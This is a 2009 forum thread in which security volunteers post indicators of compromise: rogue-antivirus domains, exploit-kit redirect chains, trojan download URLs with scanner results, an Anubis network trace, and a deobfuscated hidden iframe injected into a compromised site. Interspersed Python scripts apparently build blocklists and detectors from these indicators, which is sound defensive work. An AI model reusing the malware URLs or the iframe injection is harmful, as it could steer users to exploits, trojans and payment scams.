Topic: daily something......


April 19, 2009, 07:27:13 am
Reply #330
sparsha

AV/antispyware rogue-related sites:

http://int.reporting32.com/stat.php?func=installrun&id=200002&landing=-1&lang=EN&sub=0
http://dl.scan-antispy-4pc.com/get/?pin=0&lnd=0&type=main
http://sales.mypaymentarea.com/MjAwMDAy_MA==_QkE0MjAxNEM5RTNCMjI3OEE2QkI=/YXZh/1
https://wisypay.net/purchase/?vendor=2&id=49eaa01f4444b


April 20, 2009, 05:57:08 am
Reply #331
CkreM

Redirects to exploits:
odmina.ru/?v=myid37&lid=1033
Wepawet: http://wepawet.iseclab.org/view.php?hash=2a8ea1f1e331a0826ca485ab9e3232e3&t=1240038315&type=js

Redirect to exploits:
mixbunch.cn/thread.html
Wepawet: http://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js

Exploits/trojan:
sunmaiamibich.ru/pupu/in.php
Wepawet: http://wepawet.cs.ucsb.edu/view.php?hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628&type=js

Trojan:
tayforlive.ru/gh.exe
VirusTotal: http://www.virustotal.com/analisis/4317e8d4fca9ab9bf03c9cb727e43037

Trojan:
feds-r-watching.us/load.php?id=0&spl=1.exedec
VirusTotal: http://www.virustotal.com/analisis/8b1f9ae18260c2d50f447e34eef66e02

Redirect to rogue:
spyware-files.info/0/go.php?sid=2
spyware-file.info/0/go.php?sid=2

AV fraud:
http://loyalvideoz.com/scan/?id=260

April 21, 2009, 12:59:20 pm
Reply #332
sparsha

Sites related to rogue application: Home Antivirus 2009

h-a-virus-2009.com
h-a-virus2009.com
h-anti-virus-2009.com
h-anti-virus2009.com
h-antivirus2009.com
h-avirus2009.com
ha-virus2009.com
hanti-virus2009.com
hantivirus2009.com
havirus2009.com
home-a-v-2009.com
home-a-virus-2009.com
home-anti-v2009.com
home-anti-virus-2009.com
home-anti-virus2009.com
home-antiv2009.com
home-antivirus2009.com
home-av-2009.com
home-av2009.com
home-avirus2009.com
homeanti-virus-2009.com
homeantiv2009.com
homeantivirus2009.com
homeav-2009.com
homeav2009.com
homeavirus-2009.com
homeavirus2009.com
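Added example (not part of sparsha's post): the 27 names above differ only in how "home", "anti" and "virus" are abbreviated and where the hyphens sit. The script below captures that as one regex, enumerates every name the pattern admits so the ones not yet posted can be pre-blocked or watched in passive DNS, and runs the check over a few constructed proxy-log lines. The pattern is inferred from the posted list and the log lines are made up for the example; neither comes from the rogue or from the post.

```python
import itertools
import re

# The 27 domains exactly as listed in Reply #332 above.
POSTED_DOMAINS = """
h-a-virus-2009.com h-a-virus2009.com h-anti-virus-2009.com h-anti-virus2009.com
h-antivirus2009.com h-avirus2009.com ha-virus2009.com hanti-virus2009.com
hantivirus2009.com havirus2009.com home-a-v-2009.com home-a-virus-2009.com
home-anti-v2009.com home-anti-virus-2009.com home-anti-virus2009.com
home-antiv2009.com home-antivirus2009.com home-av-2009.com home-av2009.com
home-avirus2009.com homeanti-virus-2009.com homeantiv2009.com
homeantivirus2009.com homeav-2009.com homeav2009.com homeavirus-2009.com
homeavirus2009.com
""".split()

# Each posted name is "h" or "home", "a" or "anti", "v" or "virus", with an
# optional hyphen after each piece, then "2009.com".  This pattern is an
# assumption inferred from the posted list, not taken from the rogue itself.
FAMILY_RE = re.compile(r"^h(?:ome)?-?a(?:nti)?-?v(?:irus)?-?2009\.com$", re.I)

# The same pieces as alternatives, so the full permutation space can be built.
PIECES = [("h", "home"), ("", "-"), ("a", "anti"), ("", "-"), ("v", "virus"), ("", "-")]


def is_family_domain(name):
    """True if a hostname matches the Home Antivirus 2009 naming pattern."""
    return FAMILY_RE.match(name.strip().rstrip(".")) is not None


def enumerate_variants():
    """All 2**6 = 64 names the pattern admits."""
    return {"".join(combo) + "2009.com" for combo in itertools.product(*PIECES)}


def unlisted_variants(posted=POSTED_DOMAINS):
    """Pattern members not in the posted list: candidates to block ahead of
    time or to watch for in passive DNS."""
    return sorted(enumerate_variants() - set(posted))


# Constructed proxy-log lines (not from the post) in a squid-like
# "timestamp client status bytes method url" layout.
SAMPLE_PROXY_LOG = """\
1240300000.123 10.0.0.7 TCP_MISS/200 5123 GET http://home-antivirus2009.com/buy.php?id=1
1240300001.456 10.0.0.9 TCP_MISS/200 812 GET http://www.example.com/index.html
1240300002.789 10.0.0.7 TCP_MISS/302 0 GET http://hav2009.com/
1240300003.000 10.0.0.4 TCP_MISS/200 2048 GET http://homeav-2009.com/download/setup.exe
"""


def flag_proxy_log(log_text):
    """Return (client, host) pairs for every request to a family domain."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        host = re.sub(r"^https?://", "", fields[5]).split("/")[0].split(":")[0]
        if is_family_domain(host):
            hits.append((fields[1], host.lower()))
    return hits
```

Note that hav2009.com in the sample log is not in the posted list but is caught anyway, which is the point of matching the pattern rather than the 27 literal names.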

April 21, 2009, 09:19:08 pm
Reply #333
CkreM

April 22, 2009, 04:43:24 am
Reply #334
SysAdMini

coolwallpapers.statusinfotech.com/ppi/install.exe
VirScan: http://virscan.org/report/6fcf3670f1e511be8925b19d176205dc.html (14/38)

April 22, 2009, 06:33:20 am
Reply #335
SysAdMini

April 22, 2009, 11:26:06 am
Reply #336
Malware-Web-Threats

209.44.126.29

Redirects to exploits:
hxxp://individualpeople.biz/go.php?sid=1
Wepawet

Exploits:
hxxp://individualpeople.biz/go.php?sid=6
Wepawet

PDF Exploits:
hxxp://209.44.126.30/unsecurity/pdf.php?id=19663

File name: 1.pdf
File size: 7324 bytes
MD5: be9a4f50c3fb024a170b9ec53dd712d4
VirusTotal - 15/40 (37.5%)

Trojan:
hxxp://209.44.126.30/unsecurity/load.php?id=19663

File name: load.exe
File size: 94208 bytes
MD5: 47c0c6c2ce07c291651070b03dd83d7f
VirusTotal: Trojan TDSS - 29/40 (72.5%)
Anubis

Quote
From ANUBIS:1033 to 92.48.91.145:80 - [trafficstatic.net] 
Request: GET /banner/crcmds/main 
Response: 200 "OK" 
.......
From ANUBIS:1053 to 72.233.114.126:80 - [statsanalist.cn] 
Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 
Response: 200 "OK" 
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 
Response: 200 "OK" 
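Added example, not from the post above: a small parser for the Anubis trace quoted there. It turns the From/Request/Response lines into request records carrying the destination host, IP and port, base64-decodes the query parameters, and emits (host, ip, port) triples for blocklisting. The trace text is the one quoted in the post. Decoding stops at base64; the short punctuation strings that fall out ("^^", "_") look like a further transform that is not recovered here, which is an assumption on my part.

```python
import base64
import re

# The Anubis network trace quoted in Reply #336 above, with its "......."
# elision kept as it appears there.
ANUBIS_TRACE = """\
From ANUBIS:1033 to 92.48.91.145:80 - [trafficstatic.net]
Request: GET /banner/crcmds/main
Response: 200 "OK"
.......
From ANUBIS:1053 to 72.233.114.126:80 - [statsanalist.cn]
Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"
"""

CONN_RE = re.compile(r"^From ANUBIS:(\d+) to (\d{1,3}(?:\.\d{1,3}){3}):(\d+) - \[([^\]]+)\]\s*$")
REQ_RE = re.compile(r"^Request: (GET|POST) (\S+)\s*$")
RESP_RE = re.compile(r"^Response: (\d{3})")


def _query_params(path):
    """Split the query string by hand: urllib.parse.parse_qsl would turn a
    '+' inside a base64 value into a space and corrupt it."""
    query = path.split("?", 1)[1] if "?" in path else ""
    return dict(p.split("=", 1) for p in query.split("&") if "=" in p)


def parse_trace(text):
    """One dict per HTTP request, carrying the connection it was sent on."""
    conn, requests = None, []
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            conn = {"src_port": int(m.group(1)), "ip": m.group(2),
                    "port": int(m.group(3)), "host": m.group(4)}
            continue
        m = REQ_RE.match(line)
        if m and conn:
            requests.append({**conn, "method": m.group(1), "path": m.group(2),
                             "params": _query_params(m.group(2)), "status": None})
            continue
        m = RESP_RE.match(line)
        if m and requests:
            requests[-1]["status"] = int(m.group(1))
    return requests


def decode_b64_params(params):
    """Base64-decode every value that is valid base64.  Returns
    {name: (raw_bytes, all_printable)}; non-base64 values are left out."""
    out = {}
    for name, value in params.items():
        try:
            raw = base64.b64decode(value, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        out[name] = (raw, all(0x20 <= b < 0x7F for b in raw))
    return out


def network_iocs(requests):
    """Sorted, de-duplicated (host, ip, port) triples for blocklisting."""
    return sorted({(r["host"], r["ip"], r["port"]) for r in requests})
```

The printable flag is what tells you whether base64 was the only layer: affid and prov decode to "^^" and "_", subid to bytes starting with 0x19, so the real affiliate and sub-IDs are still hidden behind something else.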

April 22, 2009, 07:22:22 pm
Reply #337
SysAdMini

April 22, 2009, 07:35:11 pm
Reply #338
Malware-Web-Threats

JS iframe:
hxxp://counnter.cn/top100_00.js
Wepawet

Exploits:
hxxp://counnter.cn/z/count.php?o=1
Wepawet

Exploits:
hxxp://counnter.cn/z/exploits/x9.php?zenturi=1
hxxp://counnter.cn/z/exploits/x7b.php
Wepawet
Jsunpack

Exploits (x15b.zip):
hxxp://counnter.cn/z/exploits/x15b.php
VirusTotal: Trojan 33/40 (82.5%)

Trojan (getexe.exe):
hxxp://counnter.cn/z/getexe.exe?o=1&t=1239892730&i=2154770527&e=10
VirusTotal: Trojan - 15/40 (37.5%)

April 22, 2009, 07:35:31 pm
Reply #339
SysAdMini

April 22, 2009, 10:54:30 pm
Reply #340
PaJamis

hxxp://www.edfvc.com

Comes up with Mal/Obfjs-AE with Sophos
http://www.sophos.com/security/analyses/viruses-and-spyware/malobfjsae.html

Obfuscated JS resolves to:

<iframe src="hxxp://googl-analisys.com/adwds/words.php?U8jG" style="display:none"></iframe>
MysteryFCM: Encased iFrame HTML in BBCode "CODE" tags.
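Added example (not PaJamis's code or the page's own): a static check for the kind of injection reported above, an off-site iframe hidden with display:none. It parses HTML with the standard library, keeps only iframes whose host differs from the page's, and flags those hidden by style or sized to 1px or less. The sample page is constructed around the iframe from the post. Since the real site served that iframe through obfuscated JavaScript, a check like this has to run on the de-obfuscated markup or on a rendered DOM dump, not on the raw script.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

PAGE_HOST = "www.edfvc.com"  # the compromised site named in the post

# Constructed page (not the real edfvc.com markup): harmless frames plus the
# injected one the post reports, with hxxp refanged to http so it parses.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://www.edfvc.com/player.html" width="300" height="200"></iframe>
<iframe src="http://googl-analisys.com/adwds/words.php?U8jG" style="display:none"></iframe>
<iframe src="http://cdn.example.net/ad" width="1" height="1" frameborder="0"></iframe>
<iframe src="/local.html" style="visibility:hidden"></iframe>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _pixels(value):
    """'1', '1px', '0%' -> leading integer; anything else -> None."""
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def suspicious_iframes(html, page_host):
    """Return off-site iframes that are hidden by style or sized to <= 1px.
    Same-origin frames are ignored even when hidden."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlsplit(src).hostname or page_host).lower()
        if host == page_host.lower():
            continue
        reasons = []
        if HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden-by-style")
        w, h = _pixels(attrs.get("width", "")), _pixels(attrs.get("height", ""))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("tiny")
        if reasons:
            hits.append({"src": src, "host": host, "reasons": reasons})
    return hits
```

The 1x1 case is included because the same injection kits use tiny frames as often as display:none; hidden same-origin frames are skipped on purpose to keep the noise from legitimate widgets down.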

April 22, 2009, 11:34:25 pm
Reply #341
CkreM

zbot:
zss5dfggd.com/exe/ue.exe
VirusTotal: http://www.virustotal.com/analisis/d5ba440a4de0b771088cd4b3714dbfae

Trojan:
zss5dfggd.com/exe/9.exe
VirusTotal: http://www.virustotal.com/analisis/cafeb16b4df77833b8b1218f2f30b3ea

Trojan:
zss5dfggd.com/exe/lich.exe
VirusTotal: http://www.virustotal.com/analisis/dde89e65277fe2cab50bc054c4c1e499

Trojan:
zss5dfggd.com/exe/gld.exe
VirusTotal: http://www.virustotal.com/analisis/c48f145c65c717fcf4b750ae2c7cdd89

Trojan:
zss5dfggd.com/exe/mp.exe
VirusTotal: http://www.virustotal.com/analisis/862f2e619d840b98a6e359e2ddb84f24

Fake AV:
winpcdown9.com/pcdef.exe
VirusTotal: http://www.virustotal.com/analisis/ad13d92e29f9521c6ae48760ea106ed9

and the payment site it uses:
billingpayment.net/pp/?id=

Fake online scan:
litetubevideoz.com/scan
and the trojan that is downloaded:
litetubevideoz.com/codec.exe
VirusTotal: http://www.virustotal.com/analisis/7b25de92bab8faf17a0da0acd7464afb

Trojan:
litetubevideoz.com/null/exe2/3913443.exe
VirusTotal: http://www.virustotal.com/analisis/4ba420744c78124fe6c00a28045628ae

Fake online scan:
online-spyware-scan.net/online-scan.html?ewmid=226

April 23, 2009, 12:53:43 pm
Reply #342
SysAdMini

From banner ads to fake AV

perfect-banner.com/www/images/300x250_uof_2.swf?clickTARGET=_blank&clickTAG=http://perfect-banner.com/www/delivery/ck.php?oaparams=2__bannerid=250__zoneid=171__cb=c8b86ecece
Wepawet: http://wepawet.iseclab.org/view.php?hash=17501d47ade222cffa45fc0f2f7c84bc&type=swf

swf redirects to
enjoyspringtime.com/?cmpid=dologology
redirects to
crustat.com/ts/in.cgi?mfcdologology&se=oth&ur=1&HTTP_REFERER=enj-cmpid%3Ddologology
redirects to
pnfzetnax.net/pro/dologology/
redirects to
78.47.132.220/aff78.php?url=http://truconv.com/?a=125&s=4a78
redirects to
78.47.132.220/a82a/cr/adv/142/index.html
78.47.132.220/a82a/cr/srm_free_setup.exe
VirusTotal: http://www.virustotal.com/de/analisis/07fe8c68d017097af9ec74ebb8cc1dc6 (18/40)
MD5: 66c7e910330c631ba4515781f44e2788

April 24, 2009, 12:14:52 am
Reply #343
CkreM

April 24, 2009, 10:49:44 am
Reply #344
Malware-Web-Threats

Redirects to trojan:
hxxp://zbesttds.com/in.cgi?3
hxxp://zbesttds.com/in.cgi?4
Wepawet
hxxp://zbesttds.com/in.cgi?5
hxxp://400.myfilehostings.net/movie.html
Wepawet
hxxp://tafficbots.com/in.cgi?8
hxxp://tafficbots.com/in.cgi?9
Wepawet
Wepawet
Trojan:
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/3.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/4.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/6.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/7.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/8.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/9.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424103022287492/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241031340125215/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241035734251381/1.gif
Quote
Size:   125440 bytes,
MD5:   f4342703b051c0ea1c81f0330f10dc3f
VirusTotal - 30/40 (75%)

*****************
Redirects to google:
hxxp://zbesttds.com/in.cgi?11
hxxp://zbesttds.com/in.cgi?16
Wepawet
Wepawet

*****************
Redirects to rogue: (dead since a few hours)
hxxp://zbesttds.com/in.cgi?14
Wepawet

*****************
Redirects to rogue:
hxxp://hitmidpoint.com/?accs=809&tid=1
hxxp://staritquick.com/in.cgi?13&gai=csptop&gli=100&gff=cs_362527174&al=
Wepawet

*****************
Redirects to fake codec page:
hxxp://delshiktds.com/in.cgi?3
hxxp://myhealtharea.cn/in.cgi?2
Fake codec page:
hxxp://xtube-download.freehostia.com/tube.htm
Wepawet

*****************
Redirects to fake codec page:
hxxp://tafficbots.com/in.cgi?7
Wepawet
Fake codec page:
hxxp://megaporntubes09.com/xplaymovie.php?id=40011
Wepawet
Trojan:
hxxp://lll-softportal.com/softwarefortubeview.40011.exe
VirusTotal: Trojan - 7/40 (17.5%)

*****************
Redirects to rogue:
hxxp://kernelseo.com/in.cgi?default&parameter=up-file+download&se=15557
Wepawet
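Added example covering the URL conventions used throughout this thread, not code from any of the posters: hxxp:// defanging, bare host/path lines, and VirusTotal or Wepawet report links that ended up glued onto the end of a malicious URL when posts were copied. The normaliser below splits those back apart, extracts the host, and builds a per-host blocklist plus hosts-file entries. The sample lines are constructed to mirror the thread's conventions, and the list of analysis sites is an assumption for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines (not a verbatim post) in the three shapes this
# thread uses: hxxp:// defanged URLs, bare host/path lines, and URLs with a
# VirusTotal or Wepawet report link glued onto their end.
SAMPLE_LINES = [
    "hxxp://zbesttds.com/in.cgi?3",
    "hxxp://209.44.126.30/unsecurity/load.php?id=19663",
    "tayforlive.ru/gh.exehttp://www.virustotal.com/analisis/4317e8d4fca9ab9bf03c9cb727e43037",
    "mixbunch.cn/thread.htmlhttp://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js",
    "78.47.132.220/aff78.php?url=http://truconv.com/?a=125&s=4a78",
    "Redirects to rogue:",
    "spyware-files.info/0/go.php?sid=2",
    "*****************",
]

# Sandbox / multi-scanner hosts whose links got glued onto IOC lines (assumed list).
ANALYSIS_HOSTS = ("virustotal.com", "wepawet.iseclab.org", "wepawet.cs.ucsb.edu", "virscan.org")
HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$|^\d{1,3}(?:\.\d{1,3}){3}$", re.I)


def refang(line):
    """hxxp:// -> http:// (and hxxps), only at the start of the line."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", line, flags=re.I)


def split_glued(line):
    """'bad.tld/x.exehttp://www.virustotal.com/...' ->
    ('bad.tld/x.exe', 'http://www.virustotal.com/...').  An embedded
    http:// that is not an analysis site (e.g. a ?url= parameter) is left alone."""
    for m in re.finditer(r"https?://", line):
        if m.start() == 0:
            continue
        tail = line[m.start():]
        host = urlsplit(tail).hostname or ""
        if any(host == h or host.endswith("." + h) for h in ANALYSIS_HOSTS):
            return line[:m.start()], tail
    return line, None


def parse_ioc_line(line):
    """One IOC record, or None for labels, separators and blank lines."""
    line = refang(line.strip())
    if not line or " " in line or line.startswith("*"):
        return None
    ioc, analysis = split_glued(line)
    url = ioc if re.match(r"^https?://", ioc, re.I) else "http://" + ioc
    host = urlsplit(url).hostname
    if not host or not HOST_RE.match(host):
        return None
    return {"url": url, "host": host, "is_ip": host[0].isdigit(), "analysis": analysis}


def blocklist(lines):
    """host -> list of URLs seen on that host."""
    hosts = {}
    for rec in filter(None, map(parse_ioc_line, lines)):
        hosts.setdefault(rec["host"], []).append(rec["url"])
    return hosts


def hosts_file(lines):
    """hosts(5) sink-hole lines; bare IPs are skipped since a hosts file
    cannot block them (use a firewall or proxy ACL for those)."""
    return "\n".join(f"127.0.0.1 {h}" for h in sorted(blocklist(lines)) if not h[0].isdigit())
```

The glued-link split is keyed on the analysis host rather than on the second "http://" so that a redirector line like 78.47.132.220/aff78.php?url=http://truconv.com/... (Reply #342 above) keeps its embedded target intact.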